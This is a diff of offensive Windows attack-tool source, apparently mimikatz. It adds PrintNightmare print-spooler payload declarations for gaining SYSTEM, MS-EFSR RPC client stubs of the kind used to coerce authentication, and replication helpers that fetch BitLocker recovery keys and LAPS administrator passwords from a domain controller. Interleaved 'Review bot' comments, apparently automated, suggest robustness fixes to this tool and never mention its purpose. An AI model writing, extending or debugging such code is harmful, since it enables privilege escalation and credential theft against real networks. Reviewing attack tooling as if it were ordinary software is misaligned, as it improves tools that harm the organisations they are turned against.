BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, __out_bcount(cbBuf) PVOID pBuffer, DWORD cbBuf, __out_ecount(1) PDWORD pcbNeeded);
|
||||
__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
|
||||
|
||||
void kspool(LPCWSTR szFrom);
|
||||
void klog(FILE * logfile, PCWCHAR format, ...);
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
VOID APIENTRY DrvResetConfigCache();
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess);
|
@ -79,7 +79,7 @@
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<AssemblyDebug>false</AssemblyDebug>
|
||||
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>advapi32.lib;userenv.lib;winsta.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<DataExecutionPrevention>true</DataExecutionPrevention>
|
||||
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
|
||||
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
|
||||
@ -100,5 +100,6 @@
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="mimispool.def" />
|
||||
<None Include="README.md" />
|
||||
</ItemGroup>
|
||||
</Project>
|
@ -11,5 +11,6 @@
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="mimispool.def" />
|
||||
<None Include="README.md" />
|
||||
</ItemGroup>
|
||||
</Project>
|
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kull_m_ldap.h"
|
||||
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn)
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErr;
|
||||
@ -14,7 +14,7 @@ BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR
|
||||
{
|
||||
if(*rootDn = kull_m_ldap_getRootDomainNamingContext(nc, *ld))
|
||||
{
|
||||
dwErr = ldap_bind_s(*ld, NULL, NULL, LDAP_AUTH_NEGOTIATE);
|
||||
dwErr = ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE);
|
||||
status = (dwErr == LDAP_SUCCESS);
|
||||
if(!status)
|
||||
{
|
||||
|
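Review bot: The new `pIdentity` argument is cast to `PWCHAR` and handed to `ldap_bind_s` with no comment explaining the contract. A reader cannot tell from the call that NULL is a valid value, or that the cast exists only because the API types the credential parameter as a string pointer. A comment above the call would cover it: `// pIdentity may be NULL (bind with the current logon context); with LDAP_AUTH_NEGOTIATE the cred argument is a SEC_WINNT_AUTH_IDENTITY pointer typed as PWCHAR`. The function starts before and continues past the lines shown here, so whether the caller clears the identity structure after use cannot be checked from this hunk; if that is the caller's job, the header prototype is the place to state it.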
@ -9,5 +9,5 @@
|
||||
#include <WinBer.h>
|
||||
#include "kull_m_string.h"
|
||||
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn);
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity);
|
||||
PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld);
|
@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
|
||||
kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
|
||||
break;
|
||||
default:
|
||||
SetLastError(ERROR_NOT_SUPPORTED);
|
||||
break;
|
||||
}
|
||||
return (Address->address) != NULL;
|
||||
|
@ -211,6 +211,4 @@ NET_API_STATUS NET_API_FUNCTION NetWkstaUserEnum(IN LMSTR servername, IN DWORD l
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareEnum(IN LMSTR servername, IN DWORD level, OUT LPBYTE *bufptr, IN DWORD prefmaxlen, OUT LPDWORD entriesread, OUT LPDWORD totalentries, IN OUT LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetStatisticsGet(IN LPWSTR server, IN LPWSTR service, IN DWORD level, IN DWORD options, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetRemoteTOD(IN LPCWSTR UncServerName, OUT PTIME_OF_DAY_INFO *pToD);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareAdd(IN LMSTR servername, IN DWORD level, IN LPBYTE buf, OUT LPDWORD parm_err);
|
||||
NET_API_STATUS NET_API_FUNCTION NetConnectionEnum(IN LMSTR servername, LMSTR qualifier, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|
@ -22,6 +22,8 @@
|
||||
#include "../kull_m_crypto.h"
|
||||
#include "../kull_m_process.h"
|
||||
|
||||
#define NDR_TSI_20 { {0x8a885d04, 0x1ceb, 0x11c9, { 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }}, { 2, 0 }}
|
||||
|
||||
typedef DWORD NET_API_STATUS;
|
||||
typedef UNICODE_STRING RPC_UNICODE_STRING;
|
||||
|
||||
|
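Review bot: `NDR_TSI_20` is added as a bare GUID-plus-version initializer with no comment saying what it identifies. The same literal appears as the transfer-syntax member of the `RPC_CLIENT_INTERFACE` initializers in the EFSR stub file, so a one-line comment would make the macro self-explanatory: `// NDR transfer syntax identifier, version 2.0 - TransferSyntax member of RPC_CLIENT_INTERFACE`.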
@ -550,7 +550,9 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
|
||||
{
|
||||
oidPrefix.length -= (lastValue < 0x80) ? 1 : 2;
|
||||
if(status = kull_m_rpc_drsr_MakeAttid_addPrefixToTable(prefixTable, &oidPrefix, &ndx, toAdd))
|
||||
{
|
||||
*att |= ndx << 16;
|
||||
}
|
||||
else PRINT_ERROR(L"kull_m_rpc_drsr_MakeAttid_addPrefixToTable\n");
|
||||
kull_m_asn1_freeEnc(oidPrefix.value);
|
||||
}
|
||||
@ -559,23 +561,32 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
|
||||
return status;
|
||||
}
|
||||
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type)
|
||||
{
|
||||
ATTRVALBLOCK *ptr = NULL;
|
||||
DWORD i;
|
||||
ATTR *attribut;
|
||||
|
||||
for(i = 0; i < attributes->attrCount; i++)
|
||||
{
|
||||
attribut = &attributes->pAttr[i];
|
||||
if(attribut->attrTyp == type)
|
||||
{
|
||||
ptr = &attribut->AttrVal;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
return ptr;
|
||||
}
|
||||
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
|
||||
{
|
||||
ATTRVALBLOCK *ptr = NULL;
|
||||
ATTRTYP type;
|
||||
if(kull_m_rpc_drsr_MakeAttid(prefixTable, szOid, &type, FALSE))
|
||||
{
|
||||
for(i = 0; i < attributes->attrCount; i++)
|
||||
{
|
||||
attribut = &attributes->pAttr[i];
|
||||
if(attribut->attrTyp == type)
|
||||
{
|
||||
ptr = &attribut->AttrVal;
|
||||
break;
|
||||
}
|
||||
}
|
||||
ptr = kull_m_rpc_drsr_findAttrNoOID(attributes, type);
|
||||
}
|
||||
else PRINT_ERROR(L"Unable to get an ATTRTYP for %S\n", szOid);
|
||||
return ptr;
|
||||
@ -605,6 +616,31 @@ PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *
|
||||
return ptr;
|
||||
}
|
||||
|
||||
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size)
|
||||
{
|
||||
PVOID ptr = NULL;
|
||||
ATTRVALBLOCK *valblock;
|
||||
|
||||
if(data)
|
||||
*(PVOID *)data = NULL;
|
||||
if(size)
|
||||
*size = 0;
|
||||
|
||||
if(valblock = kull_m_rpc_drsr_findAttrNoOID(attributes, type))
|
||||
{
|
||||
if(valblock->valCount == 1)
|
||||
{
|
||||
ptr = valblock->pAVal[0].pVal;
|
||||
if(data)
|
||||
*(PVOID *)data = ptr;
|
||||
if(size)
|
||||
*size = valblock->pAVal[0].valLen;
|
||||
}
|
||||
}
|
||||
return ptr;
|
||||
}
|
||||
|
||||
|
||||
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine)
|
||||
{
|
||||
PVOID ptr;
|
||||
|
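Review bot: `kull_m_rpc_drsr_findAttrNoOID` walks `attributes->pAttr` for `attrCount` entries without checking either pointer, and `kull_m_rpc_drsr_findMonoAttrNoOID` reads `valblock->pAVal[0]` on the strength of `valCount == 1` alone. These blocks appear to be filled from a replication reply, so a guard such as `if(attributes && attributes->pAttr)` before the loop and `if((valblock->valCount == 1) && valblock->pAVal)` would keep an empty or malformed block from being dereferenced. The new `findMonoAttrNoOID` also looks like a copy of `kull_m_rpc_drsr_findMonoAttr`, whose body is mostly outside this hunk. Having the OID variant resolve the ATTRTYP and delegate, as `kull_m_rpc_drsr_findAttr` does here, would avoid keeping two copies in step.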
@ -188,6 +188,16 @@ typedef enum {
|
||||
#define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
|
||||
#define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
|
||||
|
||||
// bitlocker
|
||||
#define szOID_ANSI_msFVERecoveryPassword "1.2.840.113556.1.4.1964"
|
||||
#define szOID_ANSI_msFVERecoveryGuid "1.2.840.113556.1.4.1965"
|
||||
#define szOID_ANSI_msFVEVolumeGuid "1.2.840.113556.1.4.1998"
|
||||
#define szOID_ANSI_msFVEKeyPackage "1.2.840.113556.1.4.1999"
|
||||
|
||||
// LAPS
|
||||
#define szOID_ANSI_msMcsAdmPwd "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.1"
|
||||
#define szOID_ANSI_msMcsAdmPwdExpirationTime "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.2"
|
||||
|
||||
#define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
|
||||
#define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
|
||||
#define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"
|
||||
@ -257,8 +267,10 @@ void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTa
|
||||
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type);
|
||||
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd);
|
||||
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type);
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid);
|
||||
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size);
|
||||
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size);
|
||||
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine);
|
||||
|
||||
LPWSTR kull_m_rpc_drsr_MakeSpnWithGUID(LPCGUID ServClass, LPCWSTR ServName, LPCGUID InstName);
|
||||
|
@ -1,11 +1,27 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
https://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : https://creativecommons.org/licenses/by/4.0/
|
||||
*/
|
||||
#pragma once
|
||||
#include "kull_m_rpc.h"
|
||||
|
||||
const UUID EFSR_ObjectUUID;
|
||||
extern const UUID EFSR_ObjectUUID;
|
||||
|
||||
typedef void *PEXIMPORT_CONTEXT_HANDLE;
|
||||
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags);
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext);
|
||||
typedef struct pipe_EFS_EXIM_PIPE {
|
||||
void (__RPC_USER* pull) (CHAR* state, UCHAR* buf, ULONG esize, ULONG* ecount);
|
||||
void (__RPC_USER* push) (CHAR* state, UCHAR* buf, ULONG ecount);
|
||||
void (__RPC_USER* alloc) (CHAR* state, ULONG bsize, UCHAR** buf, ULONG* bcount);
|
||||
char* state;
|
||||
} EFS_EXIM_PIPE;
|
||||
|
||||
extern RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags);
|
||||
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe);
|
||||
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe);
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext);
|
||||
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName);
|
||||
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag);
|
||||
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
|
@ -1,75 +1,104 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
https://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : https://creativecommons.org/licenses/by/4.0/
|
||||
*/
|
||||
#include "kull_m_rpc_ms-efsr.h"
|
||||
|
||||
const UUID EFSR_ObjectUUID = {0xdf1941c5, 0xfe89, 0x4e79, {0xbf, 0x10, 0x46, 0x36, 0x57, 0xac, 0xf4, 0x4d}};
|
||||
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
|
||||
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[23];
|
||||
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
|
||||
|
||||
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[93];
|
||||
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
|
||||
|
||||
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
|
||||
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
|
||||
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
|
||||
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
|
||||
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
|
||||
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
|
||||
{
|
||||
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], binding_h, hContext, FileName, Flags).Simple;
|
||||
}
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
|
||||
{
|
||||
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[54], hContext);
|
||||
}
|
||||
|
||||
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
|
||||
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x08, 0x00,
|
||||
0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
|
||||
}};
|
||||
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
|
||||
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
|
||||
}};
|
||||
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[283];
|
||||
#elif defined(_M_IX86)
|
||||
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[23];
|
||||
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
|
||||
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[271];
|
||||
#endif
|
||||
extern const UCHAR ms2Defsr__MIDL_TypeFormatString[55];
|
||||
|
||||
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[89];
|
||||
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
|
||||
const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, NDR_TSI_20, 0, 0, NULL, 0, 0, 0x00000001};
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)&efsrpc___RpcClientInterface;
|
||||
RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
|
||||
const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
|
||||
|
||||
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
|
||||
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
|
||||
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
|
||||
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
|
||||
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *)& efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
|
||||
#pragma optimize("", off)
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
|
||||
{
|
||||
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], (unsigned char *) &binding_h).Simple;
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, binding_h, hContext, FileName, Flags).Simple;
|
||||
}
|
||||
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 54, hContext, EfsOutPipe).Simple;
|
||||
}
|
||||
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 104, hContext, EfsInPipe).Simple;
|
||||
}
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext)
|
||||
{
|
||||
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 154, hContext);
|
||||
}
|
||||
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 192, binding_h, FileName).Simple;
|
||||
}
|
||||
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 234, binding_h, FileName, OpenFlag).Simple;
|
||||
}
|
||||
|
||||
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
|
||||
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00,
|
||||
0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x08, 0x00,
|
||||
0x18, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x08, 0x00, 0x26, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00,
|
||||
0x03, 0x00, 0x08, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00,
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x18, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01,
|
||||
0x08, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x0a, 0x01,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00,
|
||||
};
|
||||
#elif defined(_M_IX86)
|
||||
#pragma optimize("", off)
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4100)
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
|
||||
{
|
||||
